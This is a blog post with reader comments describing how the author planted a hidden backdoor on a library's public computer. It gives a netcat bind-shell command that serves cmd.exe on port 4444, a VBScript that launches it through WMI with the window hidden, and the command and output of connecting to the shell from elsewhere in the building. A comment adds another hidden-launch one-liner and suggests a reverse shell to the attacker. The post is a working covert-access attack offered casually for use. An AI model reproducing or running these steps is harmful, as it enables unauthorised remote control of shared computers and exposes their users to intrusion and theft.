So I did this while I was at a library, since you do not need admin rights and for I didn’t need to sit at the computer. I set up a netcat listener on port 4444 for I could connect to the computer from anywhere in the building. First I got a vb script straight from MS in order for you do not see the listener running. Create a process hidden in windows I used the script I found here.
Next I downloaded netcat for windows and created a bat script to run the command I wanted.
C:\Users\Syrus\Documents\nc\nc.exe -lvp 4444 -e cmd.exe
Next I edited the vbs script to include the batch file I made
Const HIDDEN_WINDOW = 12
strComputer = "."
Set objWMIService = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
Set objStartup = objWMIService.Get("Win32_ProcessStartup")
Set objConfig = objStartup.SpawnInstance_
objConfig.ShowWindow = HIDDEN_WINDOW
Set objProcess = GetObject("winmgmts:root\cimv2:Win32_Process")
errReturn = objProcess.Create("C:\ Users\Syrus\Documents\test.bat", null, objConfig, intProcessID)
So this pipes cmd.exe to a listener on port 4444, all I need to do is find the ip of the victim and use netcat to connect. I did this by running.
$ nc -vn 10.10.9.171 4444
Connection to 10.10.9.171 4444 port [tcp/*] succeeded!
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>
Now I have access to the computer from pretty much anywhere in building. Have fun!
Subscribe to:
Post Comments (Atom)
4 comments:
thanks for sharing..
but we can do this also by running the desired batch program in shell..
set shell = CreateObject("Wscript.Shell")
shell.run "C:\system32\nc -lvp 4444 -e cmd.exe",0
it would be better if we can do a reverse shell to the attacker because usually all the computers nowadays are behind a nat
thanks for sharing this all information with us.......
Great, thanks
very useful information...
Thanx alot..
Regards Prince kumar
www.codetracker.us
Post a Comment